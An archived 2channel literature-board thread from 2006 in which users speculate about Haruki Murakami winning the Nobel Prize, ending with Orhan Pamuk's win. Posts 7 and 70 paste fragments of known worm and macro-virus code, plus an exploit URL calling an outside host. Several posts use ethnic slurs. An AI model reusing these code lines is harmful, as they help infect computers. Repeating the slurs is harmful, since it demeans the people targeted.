2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【嘘】村上春樹氏ノーベル文学賞受賞

1 :吾輩は名無しである:2006/10/03(火) 03:01:44
おめ^^


2 :吾輩は名無しである:2006/10/03(火) 03:45:12
記念パピコン

3 :名無し募集中。。。:2006/10/03(火) 06:39:26
これって…
けっこうやばいよね?……

4 :吾輩は名無しである:2006/10/03(火) 07:29:15
バカですか?

5 :吾輩は名無しである:2006/10/03(火) 12:46:11
>>1
重複につき誘導
【次は?】村上春樹・総合スレッド 3【世界へ】
http://book3.2ch.net/test/read.cgi/book/1155305182/


6 :吾輩は名無しである:2006/10/03(火) 17:32:49
これはヤバイ
なぜ情報が漏れたんだ

7 :吾輩は名無しである:2006/10/03(火) 17:37:19
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm"type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+
chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ

8 :吾輩は名無しである:2006/10/03(火) 19:07:06
変な批評家がテレビで8割9割の可能性でノーベル賞を受賞するって言ってたぞw

9 :吾輩は名無しである:2006/10/03(火) 19:48:41
その批評家の名前をさらせ

10 :吾輩は名無しである:2006/10/03(火) 20:39:21
神山睦美

11 :吾輩は名無しである:2006/10/03(火) 21:31:37
ああ、そんな名前だったよ。

12 :吾輩は名無しである:2006/10/03(火) 21:34:42
【嘘】 って付いてるから、縁起スレか。(サカ板参照)

13 :吾輩は名無しである:2006/10/03(火) 21:50:00
朝日と毎日は、各国のペンクラブ会長の票のうち村上が多数を占めていることを、
つかんでいるらしい。神山睦美の情報源は朝日。ほぼ決まりだな。

14 :吾輩は名無しである:2006/10/04(水) 03:06:44
でも今年のノーベル文学賞の発表っていつやるんだ?

15 :吾輩は名無しである:2006/10/04(水) 03:13:31
ノーベル文学賞:対象作品
村上春樹:世界の終わりとハードボイルドワンダーランド



16 :吾輩は名無しである:2006/10/04(水) 04:22:44
ノーベル文学賞は特定の作品に対して贈られるわけではない

17 :吾輩は名無しである:2006/10/04(水) 07:00:45
翻訳の仕事の効果も大きいだろう

18 :吾輩は名無しである:2006/10/04(水) 10:07:59
今日の朝日によると、
発表は10月のある木曜日。選考委員5人(今4人)が、推薦された300人から事務局とともに、
4月に15人、5月に5人に絞る。この5人について、夏に委員会4人が作品をよみくらべて決める。
ただ、最終候補に初めてなった作家は選ばないようにしているらしい。
ここからは私見だが、春樹は翻訳されていて委員も読みやすい、
社会性のある作品もある、
強烈な体験からの創作ではなく、全く自分の思考のなかから生んだ物語で、
読みやすい文だが世界共通する感情をうまく表現しているので、
事前の評判が高いのであろう。


19 :吾輩は名無しである:2006/10/04(水) 15:57:39
村上が受賞しませんように

20 :吾輩は名無しである:2006/10/04(水) 19:12:08
受賞の知らせで春樹の金玉プゥーっと膨らむわあ

21 :吾輩は名無しである:2006/10/04(水) 19:17:21
候補になってるだけでもたいしたもんだ。

22 :吾輩は名無しである:2006/10/05(木) 02:32:36
今年のノーベル賞の発表はいつなんだ?

23 :吾輩は名無しである:2006/10/05(木) 05:42:01
★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★
候補は別にスウェーデンの委員会が発表するわけではなく
まわりが勝手に思ってるだけ
受賞者が出ている海外の文学賞をひとつ買収すれば
噂の候補にならあがることになり
社会的には話題にできるわけか・・・

ふーん、なんか見えるね w
出版利権関係者や広告代理店、俗世臭い東大教授イラネ
★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★

24 :吾輩は名無しである:2006/10/05(木) 07:27:15
春樹が受賞したら、テレビが特番組みそう。
でも春樹の映像どうするんだろう....

25 :吾輩は名無しである:2006/10/05(木) 13:11:47
この人って西洋人に受けると思うね。日本的な村社会の
世界を引きずってないから。でも内容は色んな知識の
コラージュで全然感動しない。あんまり物を知らない人は
読んだら賢くなったような気分になれると思う。

26 :吾輩は名無しである:2006/10/05(木) 13:34:25
木曜って事は、外国の発表だから、今日の深夜にかけてか

27 :吾輩は名無しである:2006/10/05(木) 14:36:15
でももし仮に春樹がとったら
ビッグニュースだよね

28 :吾輩は名無しである:2006/10/05(木) 14:40:51
>>27
世界中のアメリカ文学愛好家に叩かれそうだなあ…orz

29 :吾輩は名無しである:2006/10/05(木) 14:46:11
世界の終わりとハードボイルドはすごいよたしかに
でもそれだけじゃあなぁ

30 :吾輩は名無しである:2006/10/05(木) 14:48:46
ぶっちゃけると、ハルキがとるより、翻訳があまり出ていないけど、すさまじい作家が
受賞して、翻訳数増加とかが、いいんだよなあ…。

31 :吾輩は名無しである:2006/10/05(木) 15:32:59
カズオイシグロが村上春樹好きなのは何でだろう・・・・・

32 :吾輩は名無しである:2006/10/05(木) 15:34:43
>>31
カズオイシグロは別格だよなあ…。
2,30年後にマジでカズオイシグロはとるかもしれない。いやとらないか。

33 :吾輩は名無しである:2006/10/05(木) 17:01:35
春樹がとることによる出版界の経済効果は焼く12億円

34 :吾輩は名無しである:2006/10/05(木) 18:26:23
受賞おめ

35 :吾輩は名無しである:2006/10/05(木) 18:40:05
大江が取ったんだから、春樹が取るとバランスがよくなる。
そして大江と春樹の対談が行なわれ、両者の小説の読者が増えれば、日本文学は盛り上がる。

36 :吾輩は名無しである:2006/10/05(木) 18:41:38
いい悪いは別にして、バランスは良くない。
二人とも同じだから。

37 :吾輩は名無しである:2006/10/05(木) 18:53:40
発表はいつ〜?いつなの〜よ?

38 :吾輩は名無しである:2006/10/05(木) 18:54:37
ねえねえ、発表はいつなの?

39 :吾輩は名無しである:2006/10/05(木) 18:55:42
ねえってば! 発表はいつなのよ。
教えてちょ。


40 :吾輩は名無しである:2006/10/05(木) 18:56:30
お願いだから、教えて下さい。
発表はいつなの。いつ?

41 :吾輩は名無しである:2006/10/05(木) 18:57:57
発表はいつなんだよ!はやく教えろよ!
レスすりゃいいだけだろ!

42 :吾輩は名無しである:2006/10/05(木) 19:11:03
はいはい。たぶん来週10/12(木)の夜8時頃だよ。
今日の可能性もあったけどな・・。

43 :吾輩は名無しである:2006/10/05(木) 19:17:54
「動いている」村上春樹の画像・・いっぺん観てみたいものだ

44 :吾輩は名無しである:2006/10/05(木) 19:32:22
>>6
あ り が と !

45 :吾輩は名無しである:2006/10/05(木) 23:28:31
ttp://book.asahi.com/clip/TKY200610050216.html

エングダール代表は「全くの偶然だ。カフカ賞の選考委員は優秀だが、ムラカミ氏が受賞したの?」と受け流す。

46 :吾輩は名無しである:2006/10/06(金) 11:27:27
12日には、全世界1000万人の春樹ファンのため息が響き渡りそうだ。

47 :吾輩は名無しである:2006/10/06(金) 12:39:24
春樹がとったら、あの評論家がしゃしゃりで、あいつが騒ぎ、
あのやからがコラムを書きまくり、
だれそれが分析し、あそこが記念出版をしまくり……
ああ想像するだけでいやだ

48 :吾輩は名無しである:2006/10/06(金) 18:19:09
>>43
そういえば一度も見たことないな。

49 :吾輩は名無しである:2006/10/06(金) 18:37:21
>>47
それについては ちゃんと狸が勘定してるから心配すな。

おまいは古本屋へ走って初版本を買い集めろ。いずれ上がる日を夢見て待て

50 :吾輩は名無しである:2006/10/06(金) 22:08:02
島田先生が妨害工作してるのが見えるようです

51 :吾輩は名無しである:2006/10/06(金) 22:24:46
保坂先生が食い止めるから大丈夫です。

52 :吾輩は名無しである:2006/10/06(金) 22:42:32
むしろ春樹と顔を間違えて保坂受賞のほうがありえる。

53 :吾輩は名無しである:2006/10/06(金) 22:46:24
髪の量が違う

54 :吾輩は名無しである:2006/10/06(金) 23:49:39
ワロタ

55 :(o^-’)b ◆m0yPyqc5MQ :2006/10/07(土) 00:52:07
はるきちはなに考えて生きてんのかね(゜_゜)

あほくさ

56 :吾輩は名無しである:2006/10/07(土) 02:46:06
406 名前:名無しさん@恐縮です[] 投稿日:2006/10/07(土) 02:39:48 ID:VhvBZvmw0
春樹にやるならまずサリンジャーに、強制的にノーベル賞を送りつけろよ。
で、サリンジャーが「いらね」って送り返してきた賞を、春樹にやればいいw

57 :吾輩は名無しである:2006/10/07(土) 04:52:06
それだったらまずヴォネガットにあげろよ。

58 :吾輩は名無しである:2006/10/07(土) 08:39:05
それだったら、まず野崎に

59 :吾輩は名無しである:2006/10/07(土) 09:06:07
サリンジャーはぜったい受け取らないから、意味
あるんだろw サリンジャー大好きでーす、っていう
ハルキがサリンジャーが拒絶したものを、平身低頭で
受け取る様が目に浮かぶ。

サルトルがはね除けたノーベル賞を、サルトルの影響を
公言してやまないオオエが嬉々として受け取ったように。

60 :吾輩は名無しである:2006/10/07(土) 09:41:01
保坂はそこまで春樹を嫌っていない。

61 :吾輩は名無しである:2006/10/07(土) 10:58:01
まあ大江と同じレベルに春樹がなるのは一生無理だろうな。

62 :吾輩は名無しである:2006/10/07(土) 14:24:41
みんな要らないなら僕が・・・
作品ないけど

63 :吾輩は名無しである:2006/10/07(土) 14:45:00
浅田によると次は春樹らしいよ

64 :吾輩は名無しである:2006/10/07(土) 14:47:54
田中康夫
そういや村上春樹も『キャッチャー・イン・ザ・ライ』の改訳に続いて、マンガ雑誌みたいなのを出したよね。

浅田彰
『少年カフカ』ね。『海辺のカフカ』の読者から寄せられた質問や感想に村上春樹が答えたのをまとめたっていうんでしょ。
 ぼくは、村上春樹って、あの田舎くささと貧乏くささに耐えられなくて、どうしても最後まで読めないから、田中康夫流に「読まずに評する」しかないんだけど、率直にいって最低のものだと思うよ。
『キャッチャー・イン・ザ・ライ』だって、旧来の野崎孝訳『ライ麦畑でつかまえて』は、やや古臭いものの威勢のいい語り口で、なかなかよかった。村上春樹はそれを去勢しちゃったわけね。
たとえば、お得意の「やれやれ」っていう言い回しで、外に対する怒りを内なるあきらめに転化して流しちゃう。小説だって同じでしょ。
 でも、たとえばノーベル文学賞が次に日本に回ってきたとき村上春樹が受賞する可能性は高いよ。
海外でものすごく翻訳されてるから。彼は、アメリカのミニマリズムを日本に持ってきて、いわば翻訳小説を書いてるんだけど、それをまた向こうに持っていくから、わかりやすいんだな。
そこはかとない日本的あきらめムードみたいなのをアメリカのミニマリズム風味で書く、と。
 全共闘世代転向組の加藤典洋なんかは、そこに乗っかって村上春樹論を書き、一種の権威になっちゃった。あるいは、上の世代でいうと、村上春樹は河合隼雄と仲がいい。
詩人の守中高明が、この河合―村上―加藤というのが最悪のラインだって言ってたけど、それは当たってると思うな。
河合隼雄に接近著しいジジイ・キラーの中沢新一とか、村上春樹の翻訳のブレーンである柴田元幸とかも、そこに加えていい。それは、端的に言うと、反田中康夫的なものであり、反石原慎太郎的なものでもあるわけ。
つまり、闘ってるやつらを皮肉な目で傍観しながら、「やれやれ」と肩をすくめてみせる、去勢されたアイロニカルな自意識ね。いまやこれがマジョリティなんだなァ。

65 :吾輩は名無しである:2006/10/07(土) 15:21:53
浅田彰の「ボクは小説が書けないコンプレックス」は
まっすぐ村上春樹に向かうしかない。

田中康夫の「ボクには創作力も想像力も無いコンプレックス」は
ミニ石原慎太郎へと向かうしかない。

浅田は自分の磁場で徹底して勝負すればまだ救いようがあるが
田中康夫はまるでダメだ。半端に現実に塗れて死ぬのは
季節の上に死に絶えていく凡人の特徴。


66 :吾輩は名無しである:2006/10/07(土) 15:26:11
>>64
いくら知能指数が低いからといって
的はずれのくだらんコピペをべたべた貼りまくるとは笑止千万。
文学板に書き込みたいなら
自分の言葉で自分の考えを書け。どんなに稚拙でもその方がはるかに
文学板らしい。

でなければ、書くな。来るな。
己れに似合いの板へ逝け。



67 :吾輩は名無しである:2006/10/07(土) 18:00:16
その知能指数の低い奴のコピペに釣られ、わざわざ
自らの知能指数の低さを露呈する書き込みをするくらいなら
乱立する村上春樹関係の糞スレ群をひとつでも消えるように
スレ削除依頼でもしてろよ、アホが。
文学板の肥溜めなんだよ、春樹関係のスレは。

68 :吾輩は名無しである:2006/10/07(土) 18:04:47
>>67
この糞スレ立てたアホにきつく言うとけw

69 :吾輩は名無しである:2006/10/07(土) 18:09:35

>どんなに稚拙でも
>どんなに稚拙でも

70 :吾輩は名無しである:2006/10/07(土) 18:25:02
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm"type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+
chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ

71 :吾輩は名無しである:2006/10/07(土) 18:30:32
>>68
>この糞スレ立てたアホにきつく言うとけw

言われた当人には酷くきつかったようで。
荒れてまんな






72 :吾輩は名無しである:2006/10/07(土) 20:51:43
あ〜あ、早く12日にならねーかな。

73 :吾輩は名無しである:2006/10/08(日) 16:35:11
春樹ファンって…

74 :吾輩は名無しである:2006/10/09(月) 08:11:17
昔の春樹はよかったがなあ

75 :吾輩は名無しである:2006/10/09(月) 11:49:38
今年は高銀

76 :吾輩は名無しである:2006/10/09(月) 19:04:17
今度こそ安部公房だろ

77 :吾輩は名無しである:2006/10/09(月) 19:08:53
安部ちゃんは故人だぜぃ。

78 :吾輩は名無しである:2006/10/09(月) 19:41:18
休日の夕方以降ってマジで文学やりたくなんね?

79 :吾輩は名無しである:2006/10/09(月) 19:58:19
意味ワカンナス

80 :吾輩は名無しである:2006/10/10(火) 09:58:20
でももし村上春樹がノーベル賞取ったらどんなスピーチをするんだろう・・・
村上春樹がタキシードを着てる姿ってなんか想像できない

81 :吾輩は名無しである:2006/10/10(火) 15:36:27
春樹は今、必死で受賞スピーチの下書き中だよ

82 :吾輩は名無しである:2006/10/10(火) 20:01:44
>>80
日本文壇批判でもするんだろ

83 :吾輩は名無しである:2006/10/10(火) 21:59:45
春樹が口笛ふきながらスパゲティを茹でてるときに、電話が鳴るんだよ。
迷った挙句に春樹は出ない。
なぜなら、スパゲティは茹で上がる寸前だったから。
5コールなった後、電話は切れる。


【ストックホルム】
「はい、残念でした。5コール鳴らしても出なかったので、今年のノーベル文学賞は該当者なしです」

84 :吾輩は名無しである:2006/10/10(火) 23:11:27
僕にとってノーベル文学賞とはひどく馬鹿げたものである。
トルストイが受賞できないこともあれば、受賞者が全く見当違いといったこともある。
それにもかかわらず、ノーベル文学賞の名前は大きいものである。
生きることの困難さに比べ、それを得ることに意味をつけるのは
あまりにも簡単だからだ。四十代の頃だろうか、
僕はその事実に気がついて一週間ばかりマラソンもできないほど驚いたことがある。
少し手を回しさえすればノーベル文学賞は選考委員の意のままになり、
あらゆる文学の価値は転換し、受賞の歴史を変える…そんな気がした。
僕はノートのまん中に1本の線を引き、
左側にノーベル文学賞を得るに値した受賞者を書き出し、
右側にノーベル文学賞に選ばれなかった作家を書いた。
選ばれなかった作家、トルストイ、プルースト、カフカ、イプセン、ゾラ…
僕はそれらを最後まで書き通すことはできなかった。


85 :吾輩は名無しである:2006/10/11(水) 00:46:12
ジャン・コクトーももらってないしな。
レイモン・ラディゲももらってないしな。
ノーベルってそんなにありがたいかな。

86 :吾輩は名無しである:2006/10/11(水) 00:51:49
村上が取らなかったら今年は日本人ゼロか?

87 :吾輩は名無しである:2006/10/11(水) 01:08:38
金ノーベルじゃなくても、銅ノーベルくらいはもらえるだろうさ。
4年後を待てばよい。

88 :吾輩は名無しである:2006/10/11(水) 16:28:45

  貧しいな






89 :吾輩は名無しである:2006/10/11(水) 16:52:35
ねー。
ノーベル賞って、いくらぐらい金払えばもらえるの?

「大江けんざぶろうのときは、光のCDの版権だった」って聞いたけど・・・。

90 :吾輩は名無しである:2006/10/11(水) 22:43:52
http://www.ladbrokes.com/lbr_sports?action=go_type&category=SPECIALS&class_id=110000062&type_id=210003519
村上4位w

91 :吾輩は名無しである:2006/10/11(水) 23:54:51
今日ですな?

92 :吾輩は名無しである:2006/10/12(木) 00:00:21
谷崎潤一郎もらってない永井荷風もらってない北杜夫もらってない
井伏鱒二もらってない稲垣足穂もらってないロラン・バルトもらってない
……、村上春樹がこれらより偉いとはとうてい思えない

いよいよ今日だ

93 :吾輩は名無しである:2006/10/12(木) 00:01:27
今日の何時?

94 :吾輩は名無しである:2006/10/12(木) 00:02:32
しらん

95 :(o^-’)b ◆m0yPyqc5MQ :2006/10/12(木) 00:03:14
本屋さんに悪いからもらえればいいねww

春樹フィーバー望みまくってるんだから。
かわいそうだよ、あれ全部またしまうのはw

96 :吾輩は名無しである:2006/10/12(木) 00:03:28
>>93
日本時間夜8時

97 :吾輩は名無しである:2006/10/12(木) 00:04:51
アフターダーク文庫版の帯いっせい張替え

98 :吾輩は名無しである:2006/10/12(木) 00:06:19
>>92 偉いとかじゃないと思うんだgaW
翻訳されてないとダメポ

99 :吾輩は名無しである:2006/10/12(木) 00:13:24
まじでとったら、コネとは言えすごいな

100 :吾輩は名無しである:2006/10/12(木) 00:32:08
まじでとったら、ネコとは言えすごいな

101 :吾輩は名無しである:2006/10/12(木) 00:42:47
いよいよ春樹か

102 :吾輩は名無しである:2006/10/12(木) 00:44:35
と見せかけて保坂。

103 :吾輩は名無しである:2006/10/12(木) 01:20:56
>>102
だったらおもしろいぞ!!

◇「プレーンソング」「草の上の朝食」などが全国の書店で山積み。
◇「少年アキラ」出版。
◇「保坂ラジオ」スタート。
◇都内のいろんなところで、『かずしろうくん』が出没。
◇全国の和志ストたちが、キャットフードをばらまいて回る。

うーん、おもしろくなりそうだ・・・。

104 :吾輩は名無しである:2006/10/12(木) 01:28:53
と見せかけて川本三郎。
3兄弟の長兄、書店に並ぶ作品は絶版。


105 :遊介 ◆m0yPyqc5MQ :2006/10/12(木) 01:31:54
たぶん顔で間違えて保坂さんだろうね


はるきち地味すぎるもんwww

106 :吾輩は名無しである:2006/10/12(木) 01:37:59
保坂さんがメジャーデビューしてる状況を見てみたい。
流行語大賞は「差異と反復」

107 :吾輩は名無しである:2006/10/12(木) 02:03:04
春樹がとったら早稲田はお祭り騒ぎだな

108 :吾輩は名無しである:2006/10/12(木) 02:20:55
今年はトルコ人かチョンがもらってアジア枠が埋まる。
今後10年、万年候補と言われ、そして忘れられる。

109 :吾輩は名無しである:2006/10/12(木) 02:28:16
どうでもいいが、ノーベルとれなかったら
村上春樹とそのアホ信者はこの世から消えろ。
これ以上低脳ぶりを晒すな。

110 :吾輩は名無しである:2006/10/12(木) 02:41:39
>109
お前が真っ先に消えるべきだな一番低脳だからw

111 :吾輩は名無しである:2006/10/12(木) 02:43:22
>109
このスレごと消えろ。ばかたれがw

112 :吾輩は名無しである:2006/10/12(木) 02:48:19
マジレスするが春樹信者って生きてて恥ずかしくないの?

113 :吾輩は名無しである:2006/10/12(木) 02:49:28
全国の書店や出版社は口ではノーベル賞は取れない
とかいいながら絶対とって欲しいはず
そうすると話題になって儲けられるからね

日本のマーケットのためにも春樹にノーベル賞を与えるのは
良いことだと思う

114 :吾輩は名無しである:2006/10/12(木) 02:50:36
正直ハズカシス・・・
ジョイスでも読んで心を入れ替えますw

byアホ信者w

115 :吾輩は名無しである:2006/10/12(木) 02:53:19
村上春樹って中谷彰浩とか河村隆一と同じ匂いがするよな

116 :吾輩は名無しである:2006/10/12(木) 13:19:30
村上春樹は神だと思っている。
7年ほど前の正月休みに両親と静岡市のカズ実家(もんじゃ焼き屋)に
食べに行った時の話。
両親と3人で鉄板を囲んで食事をしているといきなり村上春樹が
玄関から入ってきた。もんじゃ焼き屋に似合わないイタリアンないでたちで。
春樹が「俺いつもの〜」と言って二階へ上がろうとすると、
店内にいた高校生集団が「春樹さん!」「春樹さんかっけー!」などと
騒ぎ出し、春樹が戻ってきてくれて即席サイン会になった。
店内に13、4人ほど居合わせた客全員に店内にあった色紙を使い
サインをしてくれた。
高校生達がカズの母校静岡学園のサッカー部だとわかった春樹は
いい笑顔で会話を交わしていた。
そして春樹は「またな〜」と二階に上がっていき、店内は静かになった。
私と両親は春樹の気さくさとかっこよさに興奮しつつ
食事を終え、会計を済ませようとレジに向かうと、店員さん(カズ妹)が
階段の上を指差しながら
「今日のお客さんの分は出してくれましたから。また来てくださいね」と。
あれには本当にびっくりした。


117 :吾輩は名無しである:2006/10/12(木) 14:03:34
>>116
こんなおもしろい話をありがとう。おれ、ネットでいろいろ検索して読んだもの
の中で、いちばんおもしろかった。つくりばなしであっても、ほんとのはなしでも、
どっちだっていいのです。

118 :吾輩は名無しである:2006/10/12(木) 14:08:46
なんで皆一ヶ所だけカズのままにしとくのか?

119 :吾輩は名無しである:2006/10/12(木) 16:18:18
こんなつまんない話をありがとう。おれ、ネットでいろいろ検索して読んだもの
の中で、いちばんつまんなかった。つくりばなしであっても、ほんとのはなしでも、
どっちだっていいのです。
とりあえず氏ね。


120 :吾輩は名無しである:2006/10/12(木) 16:55:07
ぶっちゃけオレは、春樹さんにノーベル賞とってほしいな。
取れば全国の書店や出版関係の人は大喜びだし。
日本の人にとってはいいことばかりじゃない?
いまは発表直前だから、みんな祈ってるんだろーなー。

121 :吾輩は名無しである:2006/10/12(木) 17:23:36
もしノーベル賞をとれば、評論家達は
「経済効果ん十億円、春樹はすごい、文学は価値がある」
と誉めろよ

122 :審査委員長:2006/10/12(木) 17:36:38
ノーベル文学賞受賞者は江國香織に決まりましたww

123 :吾輩は名無しである:2006/10/12(木) 17:46:08
>>122
長谷川町子のサザエさんでいいだろ?

124 :吾輩は名無しである:2006/10/12(木) 18:46:46

決定したぞー!やったー!
http://headlines.yahoo.co.jp/hl?a=20061012-00000016-oric-ent

125 :吾輩は名無しである:2006/10/12(木) 18:48:34
オメ!

126 :吾輩は名無しである:2006/10/12(木) 18:50:32
やれやれ

127 :吾輩は名無しである:2006/10/12(木) 18:50:34
ないような気がするんだよね…

128 :吾輩は名無しである:2006/10/12(木) 18:51:19
そこで嫌われ松子の一生ですよ

129 :吾輩は名無しである:2006/10/12(木) 19:08:05
>>118
実話とされてるからカズへの敬意?

130 :弧高の鬼才 ◆W7.CkkM01U :2006/10/12(木) 19:20:32
さてと、女神待ちならぬ受賞報告待ち
受賞報国待ち

131 :吾輩は名無しである:2006/10/12(木) 19:41:02
Syrian poet favored to win Nobel Prize
AP - 1 hour, 16 minutes ago
STOCKHOLM, Sweden - A Syrian poet was favored to win the Nobel Prize in literature
Thursday, but the Swedish Academy was offering no clues, and the oddsmakers often prove wrong.


132 :吾輩は名無しである:2006/10/12(木) 19:44:13
年代記を謳っておいてスケールは高里椎奈にも劣り
例えの軽妙さとやらも西尾維新の歯牙にも歯が立たず
話の面白さは到底谷川流の足元にも及ばない

こんな人間にノーベル平和賞がふさわしいとは思わない

133 : ◆j7ckX7COfs :2006/10/12(木) 19:48:37
ホシノはおなかがすいたであります

134 :吾輩は名無しである:2006/10/12(木) 19:52:36
>>132
わかったから巣に帰れよ

135 :吾輩は名無しである:2006/10/12(木) 19:53:45
もうすぐ発表か。村上が受賞しませんように。

136 :吾輩は名無しである:2006/10/12(木) 19:55:05
もうすぐ発表か。村上が受賞しますように。

137 :吾輩は名無しである:2006/10/12(木) 19:55:31
ノーベル文学賞は20時ちょうどに発表ですか?

138 :吾輩は名無しである:2006/10/12(木) 19:56:32
間違えて保坂和志が受賞しますように

139 :吾輩は名無しである:2006/10/12(木) 19:56:58
あーあ。決まっちゃったか…。村上さんおめ。

140 :吾輩は名無しである:2006/10/12(木) 19:57:20
つーか、発表ってどこでどうやってするの?

141 :吾輩は名無しである:2006/10/12(木) 19:57:39
うお、マジ受賞かよ!すっげ

142 :吾輩は名無しである:2006/10/12(木) 19:58:13
ああ 気が狂いそうだー

143 :吾輩は名無しである:2006/10/12(木) 19:58:17
村上龍受賞キタ━━━━━━(゚∀゚)━━━━━━ !!

144 :吾輩は名無しである:2006/10/12(木) 19:59:00
ノーベル賞のサイト

http://nobelprize.org/index.html

145 :吾輩は名無しである:2006/10/12(木) 19:59:11
韓国人マジでキタ━━(━(━(-( ( (゚∀゚) ) )-)━)━) ━━ !!!!!

146 :吾輩は名無しである:2006/10/12(木) 19:59:44
もうそろそろかな?

147 :吾輩は名無しである:2006/10/12(木) 20:00:29
まだ?

148 :吾輩は名無しである:2006/10/12(木) 20:00:40
村上comでジョイスだとさ

149 :吾輩は名無しである:2006/10/12(木) 20:01:07
おめでとうっ!

150 :吾輩は名無しである:2006/10/12(木) 20:01:23
はい、村上さん残念でしたw

151 :吾輩は名無しである:2006/10/12(木) 20:01:23
Orhan Pamukだってさ
ざまーみろ

152 :吾輩は名無しである:2006/10/12(木) 20:01:29
オルハンパムクで決定しますた

153 :吾輩は名無しである:2006/10/12(木) 20:01:33
だめだ

154 :吾輩は名無しである:2006/10/12(木) 20:01:34
トルコのOrhan Pamukさんでした

155 :吾輩は名無しである:2006/10/12(木) 20:02:06
ところでオルハン・パムクって誰?

156 :吾輩は名無しである:2006/10/12(木) 20:02:11
8、9割村上受賞と言ってた似非批評家脂肪wwwww

157 :吾輩は名無しである:2006/10/12(木) 20:02:16
ばーかだれがおまえらみたいな黄色い猿にあげるかよ!!!ざまあああああ^^

158 :吾輩は名無しである:2006/10/12(木) 20:03:16
Orhan Pamukって?

159 :吾輩は名無しである:2006/10/12(木) 20:03:38
無難すぎる。しね

160 :吾輩は名無しである:2006/10/12(木) 20:03:38
http://nobelprize.org/nobel_prizes/literature/laureates/2006/
The Nobel Prize in Literature 2006

Orhan Pamuk
Turkey
b. 1952

村上春樹氏は受賞逃しました


161 :吾輩は名無しである:2006/10/12(木) 20:03:44
やれやれ

162 :吾輩は名無しである:2006/10/12(木) 20:04:12
やはり猿の書いた小説なんぞ手も足も出ない

163 :弧高の鬼才 ◆W7.CkkM01U :2006/10/12(木) 20:04:27
わろすWWWWWWWWW

164 :吾輩は名無しである:2006/10/12(木) 20:06:42
21世紀はイスラムの時代。
日本の戦後派にはノーベルクラスの人がいたが、最近になってレヴィ・ストロース的価値観が浸透してきたんだろう。

165 :吾輩は名無しである:2006/10/12(木) 20:08:04
村上本人も安心しただろう

166 :吾輩は名無しである:2006/10/12(木) 20:08:55
ちょんじゃなくて良かった

167 :吾輩は名無しである:2006/10/12(木) 20:12:47
>>165
春樹さんこんなスレに来てたんですか・・・

168 :吾輩は名無しである:2006/10/12(木) 20:13:49
やれやれ


169 :吾輩は名無しである:2006/10/12(木) 20:14:35
あははは、こらおもろい

170 :吾輩は名無しである:2006/10/12(木) 20:15:32

俺は最初から村上はないと確信してたけどね。


171 :吾輩は名無しである:2006/10/12(木) 20:18:57
ふむ

172 :吾輩は名無しである:2006/10/12(木) 20:21:21
これでいちばん誰が悲しんだかって、評論家さ。
仕事減ってよかったねwww

173 :吾輩は名無しである:2006/10/12(木) 20:22:32
神山睦美wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww


174 :吾輩は名無しである:2006/10/12(木) 20:22:51
書店の人もしょぼーん
やれやれw

175 :吾輩は名無しである:2006/10/12(木) 20:22:53
ずっと前からオルハン・パムクのファンでした。

176 :吾輩は名無しである:2006/10/12(木) 20:24:03
>>175
